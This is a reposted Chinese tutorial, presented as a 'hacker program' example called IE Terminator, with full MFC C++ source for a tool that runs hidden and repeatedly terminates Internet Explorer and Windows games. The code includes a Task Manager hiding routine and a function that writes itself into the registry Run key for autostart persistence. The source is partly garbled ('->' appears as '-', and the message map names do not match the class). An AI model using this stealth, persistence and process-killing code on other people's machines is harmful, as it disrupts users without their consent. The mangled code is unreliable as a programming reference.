分享
 
 
 

一个黑客程序开发实例 -- IE终结者

王朝vc·作者佚名  2006-01-17
窄屏简体版  字體: |||超大  

一个黑客程序开发实例 -- IE终结者

作者:f286

下载本文示例源代码

注:这个程序有一定的破坏性,请不要用于非法的目的!

代码运行效果图如下:

小弟最近看了VC知识库在线杂志第十二期中,有一篇《黑客攻击手段之偷梁换柱》突发灵感也想写一个黑客程序。经过了几天的搜集资料和试验终于写出了一个可以自动关闭IE和windows中自带游戏的小程序和大家分享,希望大家多提意见!

我在程序中采用了两种方法:

一种是采用了FindWindow(LPCTSTRlpszClassName,LPCTSTR lpszWindowName )这个函数来捕捉窗口的名称,但这种方法对于一些窗口标题变化的程序的效果就不好了。

另一种是CreateToolhelp32Snapshot( DWORD dwFlags, DWORD th32ProcessID)这个函数是对现有工作进程进行一次快照,这样根据进程的名称就可以很方便的找到它,但是它使用比第一种方法复杂,而且还要在头文件中加入#include

<tlhelp32.h这个库!下面我们来看一下程序的主要的函数。

程序一共有这么几个部分:

热键处理函数:OnHotKey(WPARAM wParam,LPARAM lParam)

隐藏程序自己的进程(在windows的任务管理器中):HidePorcess(void)

创建一个线程用于完成核心内容:CreateMyThread(void)

在程序结束时用于关闭线程:CloseMyThread(void)

列出当前系统中所有进程(如果找到要找的进程关闭它):FindMyProcess(CString m_strprocessname)

更改注册表使程序和系统一起启动运行:RegMySys(void)

具体函数内容如下:

头文件:IECloesDlg.h // IECloesDlg.h : 头文件

//

#pragma once

#include "statlink.h"

// CIECloesDlg 对话框

class CIECloesDlg : public CDialog

{

// 构造

public:

CIECloesDlg(CWnd* pParent = NULL); // 标准构造函数

// 对话框数据

enum { IDD = IDD_IECLOES_DIALOG };

protected:

virtual void DoDataExchange(CDataExchange* pDX); // DDX/DDV 支持

// 实现

protected:

HICON m_hIcon;

// 生成的消息映射函数

virtual BOOL OnInitDialog();

afx_msg void OnPaint();

afx_msg HCURSOR OnQueryDragIcon();

afx_msg LRESULT OnHotKey(WPARAM wParam,LPARAM lParam);

DECLARE_MESSAGE_MAP()

public:

afx_msg void OnBnClickedClose();

afx_msg void OnWindowPosChanging(WINDOWPOS* lpwndpos);

afx_msg int OnCreate(LPCREATESTRUCT lpCreateStruct);

afx_msg void OnDestroy();

afx_msg void OnBnClickedHide();

// 开始运行时候隐藏对话框的变量

bool m_bHide;

// 是否关闭IE

bool m_bIEClose;

// 是否关闭window自带游戏

bool m_bPlayclose;

afx_msg void OnBnClickedCloseie();

afx_msg void OnBnClickedCloseplay();

//超链接的控件变量

CStaticLink m_myemail;

// 启动一个线程

bool CreateMyThread(void);

// 线程句柄

HANDLE m_handle;

//要找到窗口的句柄

// IE的句柄

HWND m_hie;

// 扫雷游戏的句柄

HWND m_hsaolei;

//空当接龙游戏的句柄

HWND m_hkongdangjielong;

//蜘蛛纸牌游戏的句柄

HWND m_hzhizhu;

// 关闭线程

void CloseMyThread(void);

// 列出进程

void FindMyProcess(CString m_strprocessname);

// 更改注册表使程序和系统一起启动运行

void RegMySys(void);

// 在任务管理器中隐藏程序进程(这样才像个黑客)

void HidePorcess(void);

// 程序在硬盘中的路径

CString m_strfilepath;

};实现文件:IECloesDlg.cpp

// IECloesDlg.cpp : 实现文件

//

#include "stdafx.h"

#include "IECloes.h"

#include "IECloesDlg.h"

#include <tlhelp32.h//CreateToolhelp32Snapshot这个函数需要加载的头文件

#ifdef _DEBUG

#define new DEBUG_NEW

#endif

//线程函数

UINT ThreadFunc(LPVOID lParam)

{

CIECloesDlg *pdlg=(CIECloesDlg*)lParam;

while (1)

{

if (pdlg-m_bPlayclose)

{

pdlg-m_hkongdangjielong=FindWindow(NULL,"空当接龙");

pdlg-m_hsaolei=FindWindow(NULL,"扫雷");

pdlg-m_hzhizhu=FindWindow(NULL,"蜘蛛");

if (pdlg-m_hkongdangjielong)

{

Sleep(1000);

SendMessage(pdlg-m_hkongdangjielong,WM_DESTROY,0,0);

}

if (pdlg-m_hsaolei)

{

Sleep(1000);

SendMessage(pdlg-m_hsaolei,WM_DESTROY,0,0);

}

if (pdlg-m_hzhizhu)

{

Sleep(3000);

SendMessage(pdlg-m_hzhizhu,WM_DESTROY,0,0);

}

}

if (pdlg-m_bIEClose)

{

pdlg-FindMyProcess("IEXPLORE.EXE");

}

}

return 0;

}

// CIECloesDlg 对话框

CIECloesDlg::CIECloesDlg(CWnd* pParent /*=NULL*/)

: CDialog(CIECloesDlg::IDD, pParent)

, m_bHide(false)

, m_bIEClose(false)

, m_bPlayclose(false)

, m_handle(false)

, m_hie(NULL)

, m_hsaolei(NULL)

,m_hzhizhu(NULL)

,m_hkongdangjielong(NULL)

, m_strfilepath(_T(""))

{

m_hIcon = AfxGetApp()-LoadIcon(IDR_MAINFRAME);

}

void CIECloesDlg::DoDataExchange(CDataExchange* pDX)

{

CDialog::DoDataExchange(pDX);

}

BEGIN_MESSAGE_MAP(CIECloseDlg, CDialog)

//{{AFX_MSG_MAP(CIECloseDlg)

ON_WM_PAINT()

ON_WM_QUERYDRAGICON()

ON_BN_CLICKED(IDC_CHECK2, OnCheck2)

ON_BN_CLICKED(IDC_CHECK1, OnCheck1)

ON_BN_CLICKED(IDC_BUTTON1, OnButton1)

ON_BN_CLICKED(IDC_BUTTON2, OnButton2)

ON_WM_WINDOWPOSCHANGING()

ON_WM_DESTROY()

ON_WM_CREATE()

//}}AFX_MSG_MAP

ON_MESSAGE(WM_HOTKEY,OnHotKey)

END_MESSAGE_MAP()

// CIECloesDlg 消息处理程序

BOOL CIECloesDlg::OnInitDialog()

{

CDialog::OnInitDialog();

// 设置此对话框的图标。当应用程序主窗口不是对话框时,框架将自动

// 执行此操作

SetIcon(m_hIcon, TRUE); // 设置大图标

SetIcon(m_hIcon, FALSE); // 设置小图标

CheckDlgButton(IDC_CLOSEPLAY, BST_CHECKED);

m_bPlayclose=true;

CreateMyThread();

//初始化超级链接

m_myemail.m_link="mailto:f286@eyou.com";

m_myemail.SubclassDlgItem(IDC_MYEMAIL,this);

//在任务管理器中隐藏进程

// HidePorcess();

//修改注册表,使之自动启动

//RegMySys();

return TRUE; // 除非设置了控件的焦点,否则返回 TRUE

}

// 如果向对话框添加最小化按钮,则需要下面的代码

// 来绘制该图标。对于使用文档/视图模型的 MFC 应用程序,

// 这将由框架自动完成。

void CIECloesDlg::OnPaint()

{

if (IsIconic())

{

CPaintDC dc(this); // 用于绘制的设备上下文

SendMessage(WM_ICONERASEBKGND, reinterpret_cast(dc.GetSafeHdc()), 0);

// 使图标在工作矩形中居中

int cxIcon = GetSystemMetrics(SM_CXICON);

int cyIcon = GetSystemMetrics(SM_CYICON);

CRect rect;

GetClientRect(&rect);

int x = (rect.Width() - cxIcon + 1) / 2;

int y = (rect.Height() - cyIcon + 1) / 2;

// 绘制图标

dc.DrawIcon(x, y, m_hIcon);

}

else

{

CDialog::OnPaint();

}

}

//当用户拖动最小化窗口时系统调用此函数取得光标显示。

HCURSOR CIECloesDlg::OnQueryDragIcon()

{

return static_cast(m_hIcon);

}

void CIECloesDlg::OnBnClickedClose()

{

SendMessage(WM_CLOSE,0,0);

}

void CIECloesDlg::OnWindowPosChanging(WINDOWPOS* lpwndpos)

{

CDialog::OnWindowPosChanging(lpwndpos);

if (!m_bHide)

{

lpwndpos-flags&=~SWP_SHOWWINDOW;

}

}

LRESULT CIECloesDlg::OnHotKey(WPARAM wParam,LPARAM lParam)

{

if (wParam==1111||wParam==1112)

{

m_bHide=true;

ShowWindow(SW_SHOW);

}

SetWindowPos(&this-wndTopMost,0,0,0,0,SWP_NOMOVE|SWP_NOSIZE);

return 0;

}

int CIECloesDlg::OnCreate(LPCREATESTRUCT lpCreateStruct)

{

if (CDialog::OnCreate(lpCreateStruct) == -1)

return -1;

//注册热键为“Ctrl+Shift+j(J)”

RegisterHotKey(this-m_hWnd,IDC_HOTKEYA,MOD_CONTROL|MOD_SHIFT,''J'');

RegisterHotKey(this-m_hWnd,IDC_HOTKEYB,MOD_SHIFT|MOD_CONTROL,''j'');

return 0;

}

void CIECloesDlg::OnDestroy()

{

CDialog::OnDestroy();

//撤消热键的注册

UnregisterHotKey(this-m_hWnd,IDC_HOTKEYA);

UnregisterHotKey(this-m_hWnd,IDC_HOTKEYB);

//如果关闭时候线程函数还在工作就结束它

if (m_handle)

{

TerminateThread(m_handle,0);

}

}

void CIECloesDlg::OnBnClickedHide()

{

ShowWindow(SW_HIDE);

}

void CIECloesDlg::OnBnClickedCloseie()

{

m_bIEClose=!m_bIEClose;

CreateMyThread();

CloseMyThread();

}

void CIECloesDlg::OnBnClickedCloseplay()

{

m_bPlayclose=!m_bPlayclose;

CreateMyThread();

CloseMyThread();

}

// 启动一个线程

bool CIECloesDlg::CreateMyThread(void)

{

if (m_handle)

{

return true;

}

else if(m_bIEClose||m_bPlayclose)

{

m_handle=AfxBeginThread((AFX_THREADPROC)ThreadFunc,this);

return true;

}

return false;

}

// 关闭线程(如果在选中的情况下,在取消CHeck那就关闭线程)

void CIECloesDlg::CloseMyThread(void)

{

if((!m_bIEClose||!m_bPlayclose)&&m_handle)

{

TerminateThread(m_handle,0);

}

}

// 列出进程(如果找到要找的进程关闭它)

void CIECloesDlg::FindMyProcess(CString m_strprocessname)

{

//要查找进程所用到的句柄

HANDLE m_hfindhandle=CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);

PROCESSENTRY32* info=new PROCESSENTRY32;

info-dwSize=sizeof(PROCESSENTRY32);

if(Process32First(m_hfindhandle,info))

{

CString m_strname;//进程的名称

while(Process32Next(m_hfindhandle,info)!=FALSE)

{

m_strname=info-szExeFile;

if (m_strname==m_strprocessname)

{

HANDLE h=OpenProcess(PROCESS_ALL_ACCESS,TRUE,info-th32ProcessID);

if(h!=NULL)

{

Sleep(3000);

TerminateProcess(h,0);

}

}

}

CloseHandle(m_hfindhandle);//关闭进程否J则会出现错误

if (info)

{

delete info;

}

}

}

// 更改注册表使程序和系统一起启动运行

void CIECloesDlg::RegMySys(void)

{

HKEY hregkey=NULL;

CString m_strreg;

GetFullPathName("IECloes.exe",

(DWORD)m_strfilepath.GetBuffer(MAX_PATH+1),

m_strfilepath.GetBuffer(0),

NULL);

m_strreg=_T("Software\\Microsoft\\Windows\\CurrentVersion\\Run");

if (RegOpenKey(HKEY_LOCAL_MACHINE,m_strreg,&hregkey)!=ERROR_SUCCESS)

return;

else

{

m_strfilepath.ReleaseBuffer();

if(::RegSetValueEx( hregkey,

"IECloes",

0,

REG_SZ,

(CONST BYTE *)m_strfilepath.GetBuffer(0),

m_strfilepath.GetLength() )!=ERROR_SUCCESS)

return;

}

}

// 在任务管理器中隐藏程序进程

//注:这个函数只有在win98中才可以其作用,win2000\xp都不行

void CIECloesDlg::HidePorcess(void)

{

HINSTANCE hInst = LoadLibrary("KERNEL32.DLL");

if(hInst)

{

typedef DWORD (WINAPI *MYFUNC)(DWORD,DWORD);

MYFUNC RegisterServiceProcessFun = NULL;

RegisterServiceProcessFun = (MYFUNC)GetProcAddress(hInst, "RegisterServiceProcess");

if(RegisterServiceProcessFun)

{

RegisterServiceProcessFun(GetCurrentProcessId(),1);

}

FreeLibrary(hInst);

}

}

(全文完)

 
 
 
免责声明:本文为网络用户发布,其观点仅代表作者个人观点,与本站无关,本站仅提供信息存储服务。文中陈述内容未经本站证实,其真实性、完整性、及时性本站不作任何保证或承诺,请读者仅作参考,并请自行核实相关内容。
2023年上半年GDP全球前十五强
 百态   2023-10-24
美众议院议长启动对拜登的弹劾调查
 百态   2023-09-13
上海、济南、武汉等多地出现不明坠落物
 探索   2023-09-06
印度或要将国名改为“巴拉特”
 百态   2023-09-06
男子为女友送行,买票不登机被捕
 百态   2023-08-20
手机地震预警功能怎么开?
 干货   2023-08-06
女子4年卖2套房花700多万做美容:不但没变美脸,面部还出现变形
 百态   2023-08-04
住户一楼被水淹 还冲来8头猪
 百态   2023-07-31
女子体内爬出大量瓜子状活虫
 百态   2023-07-25
地球连续35年收到神秘规律性信号,网友:不要回答!
 探索   2023-07-21
全球镓价格本周大涨27%
 探索   2023-07-09
钱都流向了那些不缺钱的人,苦都留给了能吃苦的人
 探索   2023-07-02
倩女手游刀客魅者强控制(强混乱强眩晕强睡眠)和对应控制抗性的关系
 百态   2020-08-20
美国5月9日最新疫情:美国确诊人数突破131万
 百态   2020-05-09
荷兰政府宣布将集体辞职
 干货   2020-04-30
倩女幽魂手游师徒任务情义春秋猜成语答案逍遥观:鹏程万里
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案神机营:射石饮羽
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案昆仑山:拔刀相助
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案天工阁:鬼斧神工
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案丝路古道:单枪匹马
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案镇郊荒野:与虎谋皮
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案镇郊荒野:李代桃僵
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案镇郊荒野:指鹿为马
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案金陵:小鸟依人
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案金陵:千金买邻
 干货   2019-11-12
 
推荐阅读
 
 
 
>>返回首頁<<
 
靜靜地坐在廢墟上,四周的荒凉一望無際,忽然覺得,淒涼也很美
© 2005- 王朝網路 版權所有